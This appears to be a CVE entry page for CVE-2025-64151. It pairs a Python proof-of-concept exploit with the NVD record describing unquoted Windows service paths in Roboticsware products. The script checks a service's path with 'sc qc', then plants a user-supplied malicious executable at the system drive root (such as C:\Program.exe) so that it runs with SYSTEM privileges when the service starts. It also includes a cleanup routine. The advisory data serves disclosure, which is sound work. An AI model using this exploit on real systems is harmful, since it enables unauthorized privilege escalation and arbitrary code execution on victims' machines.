CVE-2025-64151

# CVE-2025-64151 PoC - Unquoted Service Path Exploitation # Target: Roboticsware products with unquoted service paths # This PoC demonstrates privilege escalation via unquoted service path import os import sys import subprocess import shutil def check_vulnerability(service_name, service_path): """ Check if a Windows service has an unquoted path with spaces """ try: result = subprocess.run( ['sc', 'qc', service_name], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Check if path contains spaces and is not quoted for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() if ' ' in path and not path.startswith('"'): print(f"[VULNERABLE] Service '{service_name}' has unquoted path with spaces") print(f"Path: {path}") return True return False except Exception as e: print(f"Error checking service: {e}") return False def exploit_unquoted_path(malicious_exe_path, target_path_component): """ Exploit unquoted service path by placing malicious executable Note: Requires write access to system drive root directory """ # Calculate the path component that Windows will try to execute # For 'C:\Program Files\Roboticsware\app.exe' # Windows tries 'C:\Program.exe' first drive_letter = target_path_component.split(':')[0] + ':\\' malicious_file = os.path.join(drive_letter, target_path_component.split()[0] + '.exe') try: # Copy malicious executable to system drive root shutil.copy2(malicious_exe_path, malicious_file) print(f"[+] Malicious file placed at: {malicious_file}") print(f"[+] When service starts, it will execute our payload with SYSTEM privileges") return True except PermissionError: print("[-] Permission denied - need write access to system drive root") return False except Exception as e: print(f"[-] Error: {e}") return False def cleanup(malicious_filename): """ Remove the planted malicious file """ drive_letter = os.getenv('SystemDrive', 'C:') + '\\' malicious_path = os.path.join(drive_letter, malicious_filename + '.exe') try: if os.path.exists(malicious_path): os.remove(malicious_path) print(f"[+] Cleaned up: {malicious_path}") except Exception as e: print(f"[-] Cleanup error: {e}") if __name__ == '__main__': print("CVE-2025-64151 Unquoted Service Path Exploitation") print("=" * 50) # Example usage service_name = "RoboticswareService" service_path = "C:\\Program Files\\Roboticsware\\service.exe" # Check if vulnerable is_vulnerable = check_vulnerability(service_name, service_path) if is_vulnerable: # Create your malicious executable and specify its path malicious_exe = "C:\\temp\\malicious.exe" # Exploit (requires appropriate privileges) exploit_unquoted_path(malicious_exe, service_path)

{"cve": {"id": "CVE-2025-64151", "sourceIdentifier": "[email protected]", "published": "2025-11-05T07:15:33.300", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Roboticsware products provided by Roboticsware PTE. LTD. register Windows services with unquoted file paths. A user with the write permission on the root directory of the system drive may execute arbitrary code with SYSTEM privilege."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN92563420/", "source": "[email protected]"}, {"url": "https://www.roboticsware.com/dev-jp/2025/10/28/announcements-20251028/", "source": "[email protected]"}]}}